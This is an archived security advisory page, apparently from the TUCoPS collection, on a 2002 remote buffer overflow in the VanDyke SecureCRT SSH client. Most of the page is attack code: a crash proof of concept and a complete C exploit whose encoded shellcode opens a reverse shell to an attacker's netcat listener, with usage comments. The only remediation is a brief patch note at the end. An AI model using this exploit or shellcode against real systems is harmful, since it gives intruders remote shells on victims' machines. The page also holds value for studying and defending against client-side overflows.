Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Security App Flaws :: win5551.htm

VanDyke SecureCRT client remote overflow via the header sequence initialization



24th Jul 2002 [SBWID-5551]
COMMAND

	VanDyke  SecureCRT  client  remote  overflow  via  the  header  sequence
	initialization

SYSTEMS AFFECTED

	SecureCRT 3.4 & 4.0 beta

PROBLEM

	Kyuzo says :
	

	SecureCRT seems to have a bug in a seemlingly  trivial  portion  of  its
	SSH connection code. When an  SSH  Client  connects  to  a  server,  the
	server sends a version string containing minor  and  major  numbers  for
	the protocol, as well as a server-specific identifier  string  which  is
	specified to be no more than 40 bytes long. Unfortunetly  the  SecureCRT
	code which handles errors relating to an  unsupported  protocol  version
	contains an unchecked buffer overflow when dealing with this  identifier
	string.
	

	The following C code is given to reproduce this bug  (yes  I  know  Perl
	would have been shorter, sorry):
	

	#include <stdio.h>

	#include <sys/types.h>

	#include <sys/socket.h>

	#include <netinet/in.h>

	

	#define PORT 9988

	

	int main(int argc, char **argv) {

	    int s, n, i, sz = sizeof(struct sockaddr_in);

	    struct sockaddr_in local, whatever;

	    char payload[510];

	

	    strcpy(payload, "SSH-1.1-");

	    for (i = 8; i < 508; i++)

		payload[i] = 'A';

	    payload[508] = 'n';

	    payload[509] = '0';

	

	    if ((s = socket(AF_INET, SOCK_STREAM, 0)) == -1) {

		perror("socket");

		return 1;

	    }

	    local.sin_family = AF_INET;

	    local.sin_port = htons(PORT);

	    local.sin_addr.s_addr = INADDR_ANY;

	    memset(&(local.sin_zero), 0, 8);

	    if (bind(s, (struct sockaddr *)&local, sizeof(struct sockaddr)) == -1) {

		perror("bind");

		return 1;

	    }

	    if (listen(s, 2) == -1)  {

		perror("listen");

		return 1;

	    }

	    printf("waiting for connection...n");

	    if ((n = accept(s, (struct sockaddr *)&whatever, &sz)) == -1) {

		perror("accept");

		return 1;

	    }

	    printf("client connectedn");

	    if (send(n, payload, sizeof(payload) - 1, 0) == -1) {

		perror("send");

		return 1;

	    }

	    printf("sent string: [%s]n", payload);

	    close(n);

	    close(s);

	    return 0;

	}

	

	After starting the (fake) server, run the  SecureCRT  client,  attach  a
	debugger   and   connect.   Notice   the   value   of    PC    is    now
	0x41414141...coincidence?
	

	

	 Update (25 July 2002)

	 ======

	

	Andrea Lisci posted an exploit :
	

	// The bug was discovered by Kyuzo

	// The schell code exploit was coded by Andrea Lisci

	// The program working in the following way

	//

	// run the exploit

	//./shellcode <netcat_machine> <netcat_port>

	// run the netcat

	// nc -l -p <netcat_port>

	// connect from secureCRT to the port 9988 using ssh version 1

	//

	// the remote shell will be opened at netcat computer

	

	

	

	#include <stdio.h>

	#include <sys/types.h>

	#include <sys/socket.h>

	#include <netinet/in.h>

	

	#define PORT 9988

	

	int main(int argc, char **argv) {

	    int s, n, i, sz = sizeof(struct sockaddr_in);

	    struct sockaddr_in local, whatever;

	    char payload[2510], *pshell;

	

	    unsigned char preshell[]="\xb8\x00\x03\xff\xe0";

	

	

	    unsigned short int a_port;

	    unsigned long a_host;

	    struct hostent *ht;

	    struct sockaddr_in sin;

	

	unsigned char shell[] =

	"\xeb\x03\x5d\xeb\x05\xe8\xf8\xff\xff\xff\x83\xc5\x15\x90\x90\x90"

	"\x8b\xc5\x33\xc9\x66\xb9\xd7\x02\x50\x80\x30\x95\x40\xe2\xfa\x2d\x95\x95"

	"\x64\xe2\x14\xad\xd8\xcf\x05\x95\xe1\x96\xdd\x7e\x60\x7d\x95\x95\x95\x95"

	"\xc8\x1e\x40\x14\x7f\x9a\x6b\x6a\x6a\x1e\x4d\x1e\xe6\xa9\x96\x66\x1e\xe3"

	"\xed\x96\x66\x1e\xeb\xb5\x96\x6e\x1e\xdb\x81\xa6\x78\xc3\xc2\xc4\x1e\xaa"

	"\x96\x6e\x1e\x67\x2c\x9b\x95\x95\x95\x66\x33\xe1\x9d\xcc\xca\x16\x52\x91"

	"\xd0\x77\x72\xcc\xca\xcb\x1e\x58\x1e\xd3\xb1\x96\x56\x44\x74\x96\x54\xa6"

	"\x5c\xf3\x1e\x9d\x1e\xd3\x89\x96\x56\x54\x74\x97\x96\x54\x1e\x95\x96\x56"

	"\x1e\x67\x1e\x6b\x1e\x45\x2c\x9e\x95\x95\x95\x7d\xe1\x94\x95\x95\xa6\x55"

	"\x39\x10\x55\xe0\x6c\xc7\xc3\x6a\xc2\x41\xcf\x1e\x4d\x2c\x93\x95\x95\x95"

	"\x7d\xce\x94\x95\x95\x52\xd2\xf1\x99\x95\x95\x95\x52\xd2\xfd\x95\x95\x95"

	"\x95\x52\xd2\xf9\x94\x95\x95\x95\xff\x95\x18\xd2\xf1\xc5\x18\xd2\x85\xc5"

	"\x18\xd2\x81\xc5\x6a\xc2\x55\xff\x95\x18\xd2\xf1\xc5\x18\xd2\x8d\xc5\x18"

	"\xd2\x89\xc5\x6a\xc2\x55\x52\xd2\xb5\xd1\x95\x95\x95\x18\xd2\xb5\xc5\x6a"

	"\xc2\x51\x1e\xd2\x85\x1c\xd2\xc9\x1c\xd2\xf5\x1e\xd2\x89\x1c\xd2\xcd\x14"

	"\xda\xd9\x94\x94\x95\x95\xf3\x52\xd2\xc5\x95\x95\x18\xd2\xe5\x16\x53\x84"

	"\x6a\x73\xa6\x55\xc5\xc5\xc5\xff\x94\xc5\xc5\x7d\x95\x95\x95\x95\xc8\x14"

	"\x78\xd5\x6b\x6a\x6a\xc0\xc5\x6a\xc2\x5d\x6a\xe2\x85\x6a\xc2\x71\x6a\xe2"

	"\x89\x6a\xc2\x71\xfd\x95\x91\x95\x95\xff\xd5\x6a\xc2\x45\x1e\x7d\xc5\xfd"

	"\x94\x94\x95\x95\x6a\xc2\x7d\x10\x55\x9a\x10\x3f\x95\x95\x95\xa6\x55\xc5"

	"\xd5\xc5\xd5\xc5\x6a\xc2\x79\x16\x6d\x6a\x9a\x11\x02\x95\x95\x95\x1e\x4d"

	"\xf3\x52\x92\x97\x95\xf3\x52\xd2\x97\x80\x26\x52\xd2\x91\x55\x3d\x95\x94"

	"\xff\x85\x18\x92\xc5\xc6\x6a\xc2\x61\xff\xa7\x6a\xc2\x49\xa6\x5c\xc4\xc3"

	"\xc4\xc4\xc4\x6a\xe2\x81\x6a\xc2\x59\x10\x55\xe1\xf5\x05\x05\x05\x05\x15"

	"\xab\x95\xe1\xba\x05\x05\x05\x05\xff\x95\xc3\xfd\x95\x91\x95\x95\xc0\x6a"

	"\xe2\x81\x6a\xc2\x4d\x10\x55\xe1\xd5\x05\x05\x05\x05\xff\x95\x6a\xa3\xc0"

	"\xc6\x6a\xc2\x6d\x16\x6d\x6a\xe1\xbb\x05\x05\x05\x05\x7e\x27\xff\x95\xfd"

	"\x95\x91\x95\x95\xc0\xc6\x6a\xc2\x69\x10\x55\xe9\x8d\x05\x05\x05\x05\xe1"

	"\x09\xff\x95\xc3\xc5\xc0\x6a\xe2\x8d\x6a\xc2\x41\xff\xa7\x6a\xc2\x49\x7e"

	"\x1f\xc6\x6a\xc2\x65\xff\x95\x6a\xc3\x98\xa6\x55\x39\x10\x55\xe0\x6c\xc4"

	"\xc7\xc3\xc6\x6a\x47\xcf\xcc\x3e\x77\x7b\x56\xd2\xf0\xe1\xc5\xe7\xfa\xf6"

	"\xd4\xf1\xf1\xe7\xf0\xe6\xe6\x95\xd9\xfa\xf4\xf1\xd9\xfc\xf7\xe7\xf4\xe7"

	"\xec\xd4\x95\xd6\xe7\xf0\xf4\xe1\xf0\xc5\xfc\xe5\xf0\x95\xd2\xf0\xe1\xc6"

	"\xe1\xf4\xe7\xe1\xe0\xe5\xdc\xfb\xf3\xfa\xd4\x95\xd6\xe7\xf0\xf4\xe1\xf0"

	"\xc5\xe7\xfa\xf6\xf0\xe6\xe6\xd4\x95\xc5\xf0\xf0\xfe\xdb\xf4\xf8\xf0\xf1"

	"\xc5\xfc\xe5\xf0\x95\xd2\xf9\xfa\xf7\xf4\xf9\xd4\xf9\xf9\xfa\xf6\x95\xc2"

	"\xe7\xfc\xe1\xf0\xd3\xfc\xf9\xf0\x95\xc7\xf0\xf4\xf1\xd3\xfc\xf9\xf0\x95"

	"\xc6\xf9\xf0\xf0\xe5\x95\xed\xed\xed\xed\xed\xed\xed\xed\xed\xed\xed\x95"

	"\xd6\xf9\xfa\xe6\xf0\xdd\xf4\xfb\xf1\xf9\xf0\x95\xc2\xc6\xda\xd6\xde\xa6"

	"\xa7\x95\xc2\xc6\xd4\xc6\xe1\xf4\xe7\xe1\xe0\xe5\x95\xe6\xfa\xf6\xfe\xf0"

	"\xe1\x95\xf6\xf9\xfa\xe6\xf0\xe6\xfa\xf6\xfe\xf0\xe1\x95\xf6\xfa\xfb\xfb"

	"\xf0\xf6\xe1\x95\xe6\xf0\xfb\xf1\x95\xe7\xf0\xf6\xe3\x95\xf6\xf8\xf1\xbb"

	"\xf0\xed\xf0\x95\xc4\x2b\x02\x75\x66\xc7\x47\x4c\x01\x81\x50\x8d\x47\x20"

	"\x50\x83\xee\x11\x05\x11\x11\x11\x01\x2d\x7a\x12\x11\x01\xff\xe0";

	

	

	 a_port=htons(atoi(argv[2]));

	 a_port ^= 0x9595;

	 //ht=gethostbyname(argv[1]);

	 //a_host= (unsigned long) *(ht->h_addr);

	 a_host=inet_addr(argv[1]);

	 a_host ^= 0x95959595;

	

	 shell[385]= ((a_port) & 0xff);

	 shell[386]= ((a_port >> 8 ) & 0xff);

	 shell[390]= ((a_host) & 0xff);

	 shell[391]= ((a_host >> 8) & 0xff);

	 shell[392]= ((a_host >>16) & 0xff);

	 shell[393]= ((a_host >>24) & 0xff);

	

	  memset(payload,0x90,sizeof(payload));

	

	

	

	    strcpy(payload, "SSH-1.1-");

	    for (i = 8; i < 267; i++)

	payload[i] = 'A';

	    payload[i+1]=0x00;

	    payload[i+2]=0xbb;

	    payload[i+3]=0x12;

	    payload[i+4]=0x00;

	    payload[i+5] = '\n';

	    payload[i+6]= '\0';

	

	    pshell=&payload;

	    pshell+=100;

	    memcpy(pshell,preshell,sizeof(preshell));

	

	    pshell=&payload;

	    pshell+=300;

	    memcpy(pshell,shell,sizeof(shell));

	

	

	    if ((s = socket(AF_INET, SOCK_STREAM, 0)) == -1) {

	perror("socket");

	return 1;

	    }

	    local.sin_family = AF_INET;

	    local.sin_port = htons(PORT);

	    local.sin_addr.s_addr = INADDR_ANY;

	    memset(&(local.sin_zero), 0, 8);

	    if (bind(s, (struct sockaddr *)&local, sizeof(struct sockaddr)) == -1) {

	perror("bind");

	return 1;

	    }

	    if (listen(s, 2) == -1)  {

	perror("listen");

	return 1;

	    }

	    printf("waiting for connection...\n");

	    if ((n = accept(s, (struct sockaddr *)&whatever, &sz)) == -1) {

	perror("accept");

	return 1;

	    }

	    printf("client connected\n");

	    if (send(n, payload, sizeof(payload) - 1, 0) == -1) {

	perror("send");

	return 1;

	    }

	    printf("sent string: [%s]\n", payload);

	    close(n);

	    close(s);

	    return 0;

	}

	

SOLUTION

	Patch   will   be   put    into    SecureCRT    3.4    and    4.0    see
	[http://www.vandyke.com]


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH